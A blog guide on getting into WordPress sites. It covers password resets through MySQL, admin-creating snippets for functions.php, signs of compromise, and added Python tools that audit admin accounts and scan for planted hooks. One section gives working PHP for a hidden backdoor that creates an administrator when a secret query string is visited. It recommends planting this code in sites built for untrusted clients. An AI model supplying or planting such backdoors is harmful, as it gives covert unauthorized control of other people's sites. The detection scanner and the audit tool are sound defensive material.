How to Hack Into a WordPress Website, The Complete Guide

We don’t condone, approve or encourage any illegal or malicious behavior! The purpose of this article is to explain how to hack or regain access to a WordPress site that belongs to you, or that you have the rights to edit, administer and access. Whatever you do, you’re doing it on your own. We’re not responsible for your actions. This guide serves only for educational purposes.

The methods described will help you regain access to the site even if you no longer have an account, but they require some information about the site and they won’t help you hack into a random WordPress installation.

In this guide, we are about to show you:


Situations you can help yourself in

If you’re in one of the following situations, our methods will help you regain access:

  • you forgot the username or email address
  • reset password option does not work on the hosting server
  • reset password emails are not coming through
  • you no longer have access to the account’s email address
  • you know the username & password, but the combination just does not work

To use the methods described below, you’ll need only one of the following:

  • FTP access to the server, or
  • cPanel access to the server, or
  • access to the MySQL database and the ability to connect to it remotely

Method #1 – the MySQL way

Use this method to change the password (or username if needed) of an existing user or to create a new account. You’ll need cPanel access or direct MySQL access to the site’s database. Let’s get started by changing the password of an existing user.

If you’re using cPanel, log in (cPanel can always be accessed via https://yoursite.com:2083), then locate and open phpMyAdmin. The list of databases and tables is on the left. You’re looking for the table that ends in _users. It’ll probably be wp_users, but if you have more than one WordPress site installed on the server, you have to find the right one.

The right table will have the user you want to edit in it. Follow the same procedure if you’re connecting to MySQL via some external client like SQLyog. Once you locate the table and the actual user record, it’s time to change the password.

As you’ve probably figured out by now, the password is saved in the user_pass field, hashed using the MD5 algorithm. Open an online MD5 generator, enter the password you want to use and click “Hash”. Copy the generated string and replace the original value of user_pass with it. In phpMyAdmin you can edit the field by double-clicking it; the procedure is similar in other MySQL clients. Save the changes and log in to WordPress with your new password.

Usernames, hashed passwords and emails are stored in the wp_users database table

Still on method #1 – creating a new user

Creating a new user is a bit more complicated but still manageable in less than a minute. Create a new record in the users table and populate user_login, user_pass (hashed with MD5, as described above) and user_email. All other fields can remain empty; they don’t matter. Save the new record. Once saved, MySQL gives it a unique ID, the number in the ID field. Remember it.

Now go to the _usermeta table. Remember, the table’s prefix has to be the same as the users table’s, for instance wp_users and wp_usermeta. If the prefix is not the same, you’re editing the wrong table (of some other WP installation) and the new account won’t work. We’ll create two new records. Ignore the umeta_id field for both of them. Set the user_id field to the value you just remembered (the new ID value in the users table). The meta_key values carry the same prefix as the tables: with the default wp_ prefix they are wp_user_level and wp_capabilities (with a custom prefix such as wpct_ they would be wpct_user_level and wpct_capabilities). For the first record set meta_key to wp_user_level and meta_value to 10. For the second one set meta_key to wp_capabilities and meta_value to a:1:{s:13:"administrator";b:1;} (the 13 is the length of the word administrator, so copy the value exactly). Save both. You’re done – log in!
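The steps above as an added example, not code from the original article: a small Python helper that produces the SQL equivalent of the rows entered by hand in phpMyAdmin and checks the two details the text warns about, the prefix of the meta_key and the exact serialized capabilities value (the 13 in s:13 is the byte length of the role name). The wp_ prefix, the login, email and password are constructed sample values. One fact worth knowing here: WordPress normally stores passwords as phpass hashes that start with $P$, not as plain MD5, but it still accepts a 32-character MD5 hash in user_pass as a legacy format and replaces it with its own hash on the next successful login, which is why the MD5 procedure works.

```python
import hashlib

# Legacy WordPress user levels that set_role() writes alongside the capabilities
USER_LEVELS = {"administrator": 10, "editor": 7, "author": 2, "contributor": 1, "subscriber": 0}


def serialize_capabilities(roles):
    """Build the PHP-serialized array stored in {prefix}capabilities.

    Format: a:<count>:{s:<bytes>:"<role>";b:1;...}. The number after s: is the
    byte length of the role name, the value most often mistyped by hand.
    """
    body = "".join(f's:{len(role.encode("utf-8"))}:"{role}";b:1;' for role in roles)
    return f"a:{len(roles)}:{{{body}}}"


def legacy_md5(password):
    """The 32-character MD5 hash an online MD5 generator produces for the password."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def prefix_matches(users_table, meta_key):
    """True when meta_key carries the same table prefix as the users table.

    wp_users together with wpct_capabilities is the mismatch the article warns
    about: the meta row would belong to a different installation and the login
    would fail.
    """
    if not users_table.endswith("users"):
        raise ValueError("expected a table name ending in 'users'")
    prefix = users_table[: -len("users")]
    return meta_key in (prefix + "capabilities", prefix + "user_level")


def sql_quote(value):
    """Escape a string literal for MySQL (backslash and single quote)."""
    return "'" + str(value).replace("\\", "\\\\").replace("'", "''") + "'"


def build_recovery_sql(prefix, login, email, password, role="administrator"):
    """SQL equivalent of the three rows added by hand in phpMyAdmin."""
    if not prefix.endswith("_"):
        raise ValueError("table prefix should end with '_' (e.g. 'wp_')")
    caps = serialize_capabilities([role])
    users, usermeta = prefix + "users", prefix + "usermeta"
    assert prefix_matches(users, prefix + "capabilities")
    return [
        f"INSERT INTO {users} (user_login, user_pass, user_nicename, user_email, "
        f"user_registered, display_name) VALUES ({sql_quote(login)}, "
        f"{sql_quote(legacy_md5(password))}, {sql_quote(login)}, {sql_quote(email)}, "
        f"NOW(), {sql_quote(login)});",
        "SET @uid = LAST_INSERT_ID();",
        f"INSERT INTO {usermeta} (user_id, meta_key, meta_value) VALUES "
        f"(@uid, {sql_quote(prefix + 'capabilities')}, {sql_quote(caps)});",
        f"INSERT INTO {usermeta} (user_id, meta_key, meta_value) VALUES "
        f"(@uid, {sql_quote(prefix + 'user_level')}, {sql_quote(USER_LEVELS[role])});",
    ]


if __name__ == "__main__":
    # Constructed sample values, not a real site
    for stmt in build_recovery_sql("wp_", "recovery_admin", "me@example.com", "12345"):
        print(stmt)
```

Run the printed statements together in phpMyAdmin’s SQL tab against the right database; LAST_INSERT_ID() picks up the ID of the new user row so you don’t have to copy it by hand.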

Method #2 – the functions.php way

This approach can be used either by editing functions.php through cPanel or with an FTP client. If you are using cPanel, find File Manager and open it. First, we have to find the active theme’s folder.

Go to the public_html/wp-content/themes folder. If you immediately see your theme and know which one it is – great. Open its folder and start editing functions.php. If not, open the site, right-click anywhere and select “View source”. Then press Ctrl + F and type /themes/; soon you’ll have a lot of URLs highlighted, and you’ll recognize the folder name of the active theme.

Find it in the file structure, open it, and start editing functions.php. Copy/paste the following code at the end of the file. If the file ends with a closing ?> PHP tag, that tag has to stay on the last line, so insert the code before it.

// Details of the account to add: change these two lines before saving the file
$new_user_email = 'myemail@domain.com';
$new_user_password = '12345';

// Only create the account if neither the login nor the email address is already taken
if ( ! username_exists( $new_user_email ) && ! email_exists( $new_user_email ) ) {
  // The email address doubles as the login name
  $user_id = wp_create_user( $new_user_email, $new_user_password, $new_user_email );

  if ( ! is_wp_error( $user_id ) ) {
    wp_update_user( array( 'ID' => $user_id, 'nickname' => $new_user_email ) );

    // Give the new account the administrator role
    $user = new WP_User( $user_id );
    $user->set_role( 'administrator' );
  }
}

Edit only the first two lines of the code to reflect your new account. If there’s already a user in WP with that email, a new account won’t be created, so make sure it’s new. Change the password as well – don’t get hacked by script kiddies. After saving the file, simply open your site: the code will run, a new account with administrator privileges will be created and you’ll be able to log in with it.

After you do so, remember to delete the code from functions.php.

Other hacking methods

By knowing the FTP, cPanel or MySQL password you’re proving that you have legitimate access rights to the server and therefore should have access to the WordPress installation(s) as well. If you don’t have any of those accounts, then you’re up to no good (hacking into other people’s sites), and that’s not nice!

Please remember that gaining unauthorized access to any computers, sites or servers is a serious crime and is promptly dealt with in most countries.

If you are worried that your WordPress site can be hacked, please check this page with a free WordPress security scanner. If you don’t have time to set up your blog, let us do it for you.

How to create a backdoor in WordPress

When the front door is closed, you might try the back door. This might sound like a malicious way of using code to enter a site without having access to it, but there are actually times when you need to regain control of your own site if somebody stole it.

If creating websites for other people is something you do, sooner or later there will be a client who refuses to pay you for your work; a client who deletes your login information and takes over control of everything you have done. Sometimes it will be enough to create a new user via FTP or to reset a password. When that’s not enough, you might want to hack your way back in or create backdoor access to your admin pages.

But if you decide to hide a small piece of code in your WordPress environment, you might save yourself some dignity and gain access to the WordPress site with administrator privileges. And that’s where the games begin.

No matter how many times this thief deletes your information or restores a backup on a server he probably owns, there is a chance he doesn’t know anything about backdoor entrances. If he did, he probably wouldn’t have needed your help in setting up WordPress, right?

Create a backdoor:

OK, enough with the talk; here’s a piece of code you will need to get the job done:

  1. Open the functions.php file
  2. Copy/paste the following code (before any closing ?> tag at the end of the file):

    add_action( 'wp_head', 'wploop_backdoor' );
    function wploop_backdoor() {
        // Runs on every front-end page load; only acts when the secret query string is present
        if ( isset( $_GET['backdoor'] ) && $_GET['backdoor'] === 'knockknock' ) {
            // wp_create_user() lives in wp-includes/user.php, which WordPress loads itself,
            // so the old require of wp-includes/registration.php is not needed
            if ( ! username_exists( 'name' ) ) {
                $user_id = wp_create_user( 'name', 'pass' );
                $user = new WP_User( $user_id );
                $user->set_role( 'administrator' );
            }
        }
    }

  3. Save changes

If you leave the code as it is, all you have to do to create a new admin on the site is visit http://www.yourdomain.com/?backdoor=knockknock

After the page has loaded, your new username is “name” and password “pass”.

Of course, you can change that in the code above by changing ‘name’ and ‘pass’ to whatever you want. You can also change the link to your back door by changing ‘backdoor’ and/or ‘knockknock’ to anything you come up with.

Try the function – not only is it fun, but it can really help you sometime in the future when you’re about to make a website for someone you can’t trust completely. You should also level up your WordPress and blogging skills.

How to create a new user account via FTP

Creating new user accounts in WordPress is very easy. As an admin, you navigate to the Users admin page, where you can create a new account for any user role. That can be done in a matter of seconds, and the newly created user can immediately log in with the given username and password.

But what happens if you lose access to your WordPress admin? Things might get a bit more complicated, but don’t worry – we have a function for you which can save your admin life.

Whether another admin deleted your account, you deleted all users from the database by mistake, used a malfunctioning plugin or got hacked, you can still get back in control. Sometimes you might only have access to your FTP server while the HTTP one is out of your reach, and you will need to create a new admin. While that might be a rare case, the following function will save you.

To create a new account outside the WordPress admin environment, all you need is FTP access to your site. As an admin, you should have all the information needed to log in to your server, and you can quickly create a new account by adding a new function to your theme.

Create a new user account via FTP:

  1. Open FTP client and connect to your account
  2. Navigate to wp-content/themes
  3. Open the folder of the theme you are using
  4. Search for functions.php file and edit it
  5. Copy and paste the following function:

    function admin_account() {
        $user  = 'Username';          // login name of the new account
        $pass  = 'Password';          // its password
        $email = 'email@domain.com';  // its email address
        if ( ! username_exists( $user ) && ! email_exists( $email ) ) {  // only if both are unused
            $user_id = wp_create_user( $user, $pass, $email );
            $user    = new WP_User( $user_id );
            $user->set_role( 'administrator' );   // 8th row: the role the new account gets
        }
    }
    add_action( 'init', 'admin_account' );   // runs on every request, so remove it afterwards

  6. Change the username, password and email to something unique
  7. Save changes

Make sure that the username, password and email address you set in the function are unique, otherwise the function won’t work properly. Once you have saved the changes, you’re done and you can navigate to your WP login panel. Use the new information to log back in, and once you have verified the account, delete the function from the functions.php file.

The function shown above creates an admin account, but you can easily modify it to create an account with any other user role. Simply change the role on the 8th row of the code (the set_role( 'administrator' ) line) to editor, author, contributor, subscriber or any other user role you have created.

Unfortunately, if you have lost your admin account, you have also lost all the posts written under that username. That’s why you should always keep a backup which you can easily retrieve. If you’re reading this while having your admin account, take this as a reminder to create a backup immediately and bookmark this article just in case you need to create an account outside WordPress in the future.

10 signs your WordPress site is hacked

WordPress is a huge blogging platform. There are millions of users, and the number seems to be growing rapidly every day. People even transfer websites created in other content management systems to this open source system more often than you might think. And while this is good, it also means that hackers will put WordPress in the number-one spot when trying to break into random sites.

Usually, if you get hacked, you will know about it instantly. Your site will become inaccessible, you won’t be able to log in and sometimes a hacker will even leave a message on the front page. But more often than not, you might not even notice that something has changed. In this part of the article, we’re about to show you several signs that might indicate that your WordPress site got hacked, and a few solutions to the problem.

1. Unsuccessful login

This sign is pretty obvious. If you have used a username and password combination for a while without ever having trouble, you may get suspicious if WordPress suddenly doesn’t recognize your account. If a hacker managed to log in to your site, the chances are that he quickly changed your admin privileges.

Maybe he changed your password or deleted your account completely. Before you start to panic the first time WordPress tells you about an incorrect username/password, consider that you might have entered a wrong combination or turned on caps lock.

Solution: Try recovering the password via email or use another account to log back in. To make sure that your login stays safe, we recommend installing the Login Ninja plugin for WordPress.

2. Malicious content is added to your site

Site contains a malware warning

If you start noticing unfamiliar content on your site, you should start worrying. Once they get access to your admin area, hackers can change your core files as well as your theme and plugin files. That means they can change anything they want.

While some hackers will drastically modify the look of your site and maybe even spell out that you got hacked, others will be much more subtle about it.

Solution: Try looking for hidden content in the website code. There might be links to malicious sites planted in the footer of your site, or hackers might have installed popups which open regularly for your visitors. Use Security Ninja to scan your site or to continuously monitor it for such problems.

3. Suspicious visits

If you are not tracking your website, you should start doing so immediately. A simple way to do so is Google Analytics which, among many other features, can tell you how many visits you get and where they come from. After some time, you will get to know your website: you will know where the visits come from, when you launched a new campaign and when new promotion links were released in the wild.

But if you suddenly notice that your site is getting a huge number of new visits from a suspicious domain, investigate further, because your site might have been hacked. Usually those visits show a 100% bounce rate, which means that only one page was accessed. Hackers frequently use automated systems that send traffic from other bad sites to yours. Whether bad code gets executed on your site or you have become part of a spamming network, things can get serious, and you will have to check your site for malicious code.

Solution: Use Google Webmaster Tools to find suspicious domains.

4. A sudden drop in traffic

Safe Browsing site status

Unlike the previous sign, this one might alert you because there is a sudden drop in the number of visits. Instead of sending new visits your way, a hacker might send visitors away from your site, for example by redirecting your site to another one. The other reason for getting fewer visitors is that Google blacklisted your site: every user then sees a warning and may choose not to open your site because it is infected.

Solution: Use Google’s Safe Browsing Site Status to check whether your site is marked as unsafe and currently dangerous to visit.

5. Search engine results are strange

If you haven’t noticed any changes on your site but find that the search results in Google and other search engines look strange (different titles and other metadata), this might be a clear sign of a hacked site. A hacker might have changed your content in a way that is visible only to an expert, yet the change shows up in the search engine results.

Solution: Check your site with Google Webmaster Tools, and check whether your site got hacked with this free online tool.

6. You can’t send/receive emails

Once a hacker gets access to your site, he will probably want to use your server to spam everyone else. When you find that you can’t send or receive emails from your WordPress site, this can be a clear sign that you got hacked. Check your email once again, then check with your provider to make sure there aren’t any errors.

Solution: Test your WordPress mail function with this free plugin.

7. Site doesn’t exist

Server not found

There are times when hackers won’t access your site to plant malicious code, redirect users or use your email for spam. Sometimes all they want is to crash your site. Rarely, a hacker will even delete everything from the entire server. That’s why it is important to host your files with a renowned hosting company which takes care of security and keeps daily, or at least weekly, backups of your website. It’s good practice to make your own backups from time to time as well, so that the site can be quickly restored.

Solution: Install one of the best plugins for backup management in WordPress.

8. Suspicious files

Similar to malicious content added to existing files, a hacker might plant extra files anywhere within your root folder. It’s good to know your way around WordPress, but if you’re not that experienced, you should have a security tool at your disposal that can check all of your files and activity. Recently we reviewed Security Ninja, which is a perfect tool for checking all of your WordPress files.

Solution: Try looking for files which don’t belong to your WordPress installation. Use Security Ninja to scan your site on a regular basis and find those files automatically. Then delete the files or remove the malicious code from infected files. Don’t forget the Core Scanner add-on for Security Ninja.
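As an added example for this sign (not code from the original article or from Security Ninja): a Python scanner that walks a wp-content directory and reports PHP files in uploads (where no PHP belongs) and PHP files that register a hook which creates a user and grants it the administrator role, the pattern used by the functions.php and backdoor snippets earlier in this article. The sample tree it builds in a temporary directory is constructed for the demonstration, and the indicator regexes and hook names are my assumptions about what such code looks like, not anything WordPress defines.

```python
import re
import tempfile
from pathlib import Path

# Indicators of the "hook creates an administrator" pattern used by the snippets in this article.
# The regexes are my own assumptions about what such code looks like, not a WordPress definition.
INDICATORS = {
    "creates_user": re.compile(r"\bwp_(create|insert)_user\s*\(", re.I),
    "grants_admin": re.compile(r"set_role\s*\(\s*['\"]administrator['\"]\s*\)", re.I),
    "request_trigger": re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\s*\[", re.I),
    "hooked": re.compile(
        r"add_action\s*\(\s*['\"](init|wp_head|wp_loaded|plugins_loaded|after_setup_theme)['\"]", re.I),
}


def inspect_php(source):
    """Map each indicator to the line numbers where it occurs in one PHP file."""
    hits = {}
    for lineno, line in enumerate(source.splitlines(), start=1):
        for name, pattern in INDICATORS.items():
            if pattern.search(line):
                hits.setdefault(name, []).append(lineno)
    return hits


def scan_wp_content(root):
    """Walk a wp-content directory and report PHP files worth a closer look."""
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*.php")):
        rel = path.relative_to(root).as_posix()
        reasons = []
        if rel.startswith("uploads/"):
            reasons.append("php_in_uploads")           # media uploads never need PHP files
        hits = inspect_php(path.read_text(encoding="utf-8", errors="replace"))
        if "creates_user" in hits and "grants_admin" in hits:
            reasons.append("creates_administrator")
            if "request_trigger" in hits:
                reasons.append("triggered_by_request")  # a query string or cookie switches it on
            if "hooked" in hits:
                reasons.append("runs_on_every_load")    # registered on a core action hook
        if reasons:
            findings.append({"file": rel, "reasons": reasons, "lines": hits})
    return findings


def build_sample_tree():
    """Constructed wp-content tree in a temp dir: a clean theme file, a planted hook, a stray upload."""
    root = Path(tempfile.mkdtemp(prefix="wpcontent_"))
    theme = root / "themes" / "sample-theme"
    (theme / "inc").mkdir(parents=True)
    (theme / "functions.php").write_text(
        "<?php\nadd_theme_support('post-thumbnails');\n"
        "add_action('init', 'sample_theme_setup');\n"
        "function sample_theme_setup() { register_nav_menu('main', 'Main'); }\n"
    )
    (theme / "inc" / "helpers.php").write_text(
        "<?php\nadd_action('wp_head', 'planted_hook');\n"
        "function planted_hook() {\n"
        "    if (isset($_GET['backdoor'])) {\n"
        "        $id = wp_create_user('name', 'pass');\n"
        "        $u = new WP_User($id);\n"
        "        $u->set_role('administrator');\n"
        "    }\n}\n"
    )
    uploads = root / "uploads" / "2023" / "01"
    uploads.mkdir(parents=True)
    (uploads / "image.php").write_text("<?php echo 'no PHP belongs here';\n")
    return root


if __name__ == "__main__":
    for finding in scan_wp_content(build_sample_tree()):
        print(finding["file"], ", ".join(finding["reasons"]), finding["lines"])
```

Point scan_wp_content() at a real wp-content copy to get the same report; a clean theme that only registers menus or thumbnails on init is not flagged, because the scanner requires user creation and the administrator grant to appear in the same file before it reports anything.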

9. New members

Depending on your site, you might be the only one able to add new members. In that case, an email telling you about newly registered users should trigger an alarm. If there are other admins who have the ability to add new members, check with them about suspicious activity.

Solution: Change the login URL with a free plugin, limit access to your WordPress login page with an .htpasswd file and use Login Ninja to protect your login form at all times.
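For this sign, and for the capabilities value used in method #1 above, here is an added example in Python (not part of the original article): a minimal parser for the PHP serialized format WordPress stores in {prefix}capabilities, plus an audit that lists every account holding the administrator role from rows exported from wp_users and wp_usermeta and flags the ones not on your list of known admins, registered after a chosen date, or whose legacy user_level row disagrees with the role (which happens when meta rows were edited by hand). The users and usermeta rows below are constructed sample data; the wp_ prefix, the known-admin list and the cut-off date are assumptions.

```python
# Legacy user level that set_role() stores next to each role
ROLE_LEVELS = {"administrator": 10, "editor": 7, "author": 2, "contributor": 1, "subscriber": 0}


def php_unserialize(text):
    """Minimal PHP unserialize() for the types found in wp_usermeta: a, s, b, i, d, N.

    Works on bytes because s:<n> counts bytes, so a hand-edited value with the
    wrong length (s:12:"administrator") is rejected instead of silently misread.
    """
    data = text.encode("utf-8")

    def parse(pos):
        tag = data[pos:pos + 1]
        if tag == b"N":                                   # N;
            return None, pos + 2
        if tag in (b"b", b"i", b"d"):                     # b:1;  i:3;  d:1.5;
            end = data.index(b";", pos)
            raw = data[pos + 2:end].decode()
            value = {b"b": lambda r: r == "1", b"i": int, b"d": float}[tag](raw)
            return value, end + 1
        if tag == b"s":                                   # s:<bytes>:"...";
            colon = data.index(b":", pos + 2)
            length = int(data[pos + 2:colon])
            start, end = colon + 2, colon + 2 + length
            if data[end:end + 2] != b'";':
                raise ValueError(f"string length {length} at byte {pos} does not match the content")
            return data[start:end].decode("utf-8"), end + 2
        if tag == b"a":                                   # a:<count>:{key;value;...}
            colon = data.index(b":", pos + 2)
            count = int(data[pos + 2:colon])
            pos = colon + 2
            result = {}
            for _ in range(count):
                key, pos = parse(pos)
                result[key], pos = parse(pos)
            if data[pos:pos + 1] != b"}":
                raise ValueError(f"unterminated array at byte {pos}")
            return result, pos + 1
        raise ValueError(f"unsupported type {tag!r} at byte {pos}")

    value, end = parse(0)
    if end != len(data):
        raise ValueError("trailing data after serialized value")
    return value


def audit_admins(prefix, users, usermeta, known_admins, since):
    """Report every account that holds the administrator role, with flags for the unexpected."""
    caps_key, level_key = prefix + "capabilities", prefix + "user_level"
    meta = {}
    for user_id, key, value in usermeta:
        meta.setdefault(user_id, {})[key] = value
    report = []
    for u in users:
        m = meta.get(u["ID"], {})
        roles = php_unserialize(m.get(caps_key, "a:0:{}"))
        if not roles.get("administrator"):
            continue
        flags = []
        if u["user_login"] not in known_admins:
            flags.append("unexpected_admin")
        if u["user_registered"] >= since:            # ISO timestamps compare as strings
            flags.append("registered_recently")
        if m.get(level_key) != str(ROLE_LEVELS["administrator"]):
            flags.append("user_level_mismatch")     # role and legacy level disagree
        report.append({"login": u["user_login"], "email": u["user_email"],
                       "roles": sorted(roles), "flags": flags})
    return report


# Constructed sample rows, shaped like a wp_users / wp_usermeta export (not a real site)
SAMPLE_USERS = [
    {"ID": 1, "user_login": "owner", "user_email": "owner@example.com", "user_registered": "2019-03-01 10:00:00"},
    {"ID": 2, "user_login": "jane", "user_email": "jane@example.com", "user_registered": "2020-06-15 09:30:00"},
    {"ID": 7, "user_login": "name", "user_email": "", "user_registered": "2023-09-14 02:13:55"},
]
SAMPLE_USERMETA = [
    (1, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'), (1, "wp_user_level", "10"),
    (2, "wp_capabilities", 'a:1:{s:6:"editor";b:1;}'), (2, "wp_user_level", "7"),
    (7, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),  # no user_level row: added by hand
]


def run_sample_audit():
    return audit_admins("wp_", SAMPLE_USERS, SAMPLE_USERMETA,
                        known_admins={"owner"}, since="2023-01-01 00:00:00")


if __name__ == "__main__":
    for entry in run_sample_audit():
        print(entry)
```

On the sample data the audit reports two administrators: owner with no flags, and name, which is not on the known list, was registered after the cut-off and has no matching user_level row, exactly what an account added through one of the snippets above looks like in the database.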

10. Check out scheduled events on your server

Sometimes a hacker won’t do a thing to your website once they find their way in. Instead, they will leave scheduled tasks that may harm your site sometime in the future. This technique is dangerous because it can leave an inexperienced victim clueless at first: you may be infected and know nothing about it.

Solution: Check the cron jobs on the server you’re using and make sure there are no suspicious scheduled tasks.

Wrapping up

We hope that this article helps you run an even safer WordPress site, and that it helps you regain access to it in bad situations. And even if your site is clean, please don’t take that for granted.
Always make sure that your blog is as safe as it can be. We suggest security plugins for WordPress, which can save you in most cases. Still, don’t be the one using an unsafe password, and be careful when hacking into your own WordPress site.

One thought on “How to Hack Into a WordPress Website, The Complete Guide”

  1. Hi there! Quick question that’s completely off topic.

    Do you know how to make your site mobile friendly? My weblog
    looks weird when browsing from my iphone.
    I’m trying to find a theme or plugin that might be able to fix this problem.
    If you have any recommendations, please share.
    Many thanks!
